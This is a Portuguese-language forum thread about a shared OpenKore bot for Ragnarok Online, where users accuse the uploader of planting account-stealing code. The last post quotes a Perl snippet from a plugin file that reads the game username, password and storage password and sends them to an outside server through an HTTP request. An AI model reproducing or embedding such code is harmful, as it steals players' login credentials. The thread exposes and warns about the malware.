Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.

Openkore Última versão postada,macro,completo,totalmente fucional,Bro Center


 Compartilhar

Posts Recomendados

Esse openkore ainda funciona ?

 

está dando o seguinte erro aqui:BOT01.JPG

 

Será que você poderia ajudar-me ?

 

 

Bom qual sistema operacional vc está usando,se não for o seven vc está fazendo algo de errado,confira o activeperl e se isntalo tudo corretamente de acordo com o tutorial

Link para o comentário
Compartilhar em outros sites

Meu Fake ? como duas pessoas podem estar online ao mesmo tempo ? ¬¬[/color]

 

Akamaruu e -Bernardo7 Safado todos sabemos que é só usar 2 navegadores diferentes que da para abrir 2 accs,eu baixei o seu bot do seu topico usei e acabei de ser roubado,cara eu te mato se te pegar Akamarru ladrão essa conta -Bernardo7 e outra conta sua que você uso 2 navegadores para abrir ela e essa sua,cara seu ladrão safado

Link para o comentário
Compartilhar em outros sites

Aff cara , olha quantas pessoas já reclamou do seu bot, daí vem um cara e reclama do seu bot e fala que é meu fake ? ¬¬

 

 

Além do mais , ninguém aqui sabe que aquele cara que postou no meu tópico é seu fake ¬¬

Link para o comentário
Compartilhar em outros sites

galera nao baixa!!!! Eu criei uma conta nova pra testar esse bot , tava com 1kk e varios equips noobs que eu coloquei no gatuno só pra ver se nao tinha nenhum problema de usar , usei o 1 dia tava tudo bem , fui logar no 2 dia tava tudo errado nao tava mais funfando o bot e tava dizendo que a senha estava incorreta , entao recuperei a senha no site da level up e meu char estava limpo!!! ladrããão!!!!

Link para o comentário
Compartilhar em outros sites

Nao , sou eu mesmo "ksdocaos" -.- , e nao estou perdendo tempo estou ajudando os outros , coisa que voce nao esta fazendo , nao to nem ai se é do Bro center ele nao ta puro voce colocou programas hackers nele pra roubar as contas e fingir de santo .

Bom... Meu aviso esta dado , quem quiser ser roubado que use esse bot , mas depois nao diga que eu nao avisei!

Link para o comentário
Compartilhar em outros sites

@ksdocaos

eu ja examinei o bot e ele ta limpo, a nao ser q tenham inventado outro jeito q roubar q eu nao conheça,

mas d qualquer forma nem tem como mudar a acc da conta do rag só com o keylogger, pq pra mudar a senha do rag, precisa da conta levelup, q nao da pra pegar pelo bot, nem com 200 KL nele

 

se for pra mentir mente direito

Link para o comentário
Compartilhar em outros sites

eu ja examinei o bot e ele ta limpo, a nao ser q tenham inventado outro jeito q roubar q eu nao conheça,

mas d qualquer forma nem tem como mudar a acc da conta do rag só com o keylogger, pq pra mudar a senha do rag, precisa da conta levelup, q nao da pra pegar pelo bot, nem com 200 KL nele

 

se for pra mentir mente direito

 

AHAZOOOO !!!

Cara muito burro... É o que eu ia falar agora... Cara invejoso D+ !!!

Link para o comentário
Compartilhar em outros sites

Bom qual sistema operacional vc está usando,se não for o seven vc está fazendo algo de errado,confira o activeperl e se isntalo tudo corretamente de acordo com o tutorial

 

 

Demorei, mas consegui fazer funcionar. Eu só precisava ler mais um pouco sobre o programa é que é a primeira vez que eu estou usando ele.

 

Obrigado por compartilha-lo conosco, você está de parabéns.

Link para o comentário
Compartilhar em outros sites

Olá,sou Unknown6996 do Fórum BROCenter e venho avisar vocês que esse Openkore possui um Kore Logger.Recebi um aviso de que estavam usando como "Fonte" o BROCenter,no bot daqui.Até achei engraçado os comentários : "O bot do BROCenter é com confiança ".

Sim,é e confiança,mas vocês estão baixando aqui,no Webcheats,onde os usuários fodem com tudo.Não estou reclamando do fórum,não,o fórum é ótimo,mas os usuários que estão bagunçando tudo,mudando a imagem do fórum.Tomem cuidado,vocês estão sendo vitimas.Uma amiga minha de fórum teve a conta hackeada e baixou aqui !

Grato pela Atenção.

O BROCenter não se responsabiliza pelas contas hackeadas.O Scan não apontou nada,porque o Korelogger é uma forma de código,um script para enviar sua senha.

Segue o link :

É necessário se cadastrar para acessar o conteúdo.

Link para o comentário
Compartilhar em outros sites

Godói,cliquei para fazer o download do openkore e olha o que apareceu :

É necessário se cadastrar para acessar o conteúdo.

 

Ok ok.Mas olhe ali,Openkore 2.7 :D

No site oficial,a última atualização parou no 2.1.O Seu é do futuro ?

Outra,no scan vem com vírus.Será que é prejudicial ?

Hum,eu não arriscaria.

Mas ai,2.7 Do Futuro ? Que que teve de atualização?

ONDE ESTÃO OS ADMINISTRADORES DESSE FÓRUM !

Tá na pasta plugins/

Arquivo BotBebado.pl :

 

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

 

Tá aqui seus troxa.

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.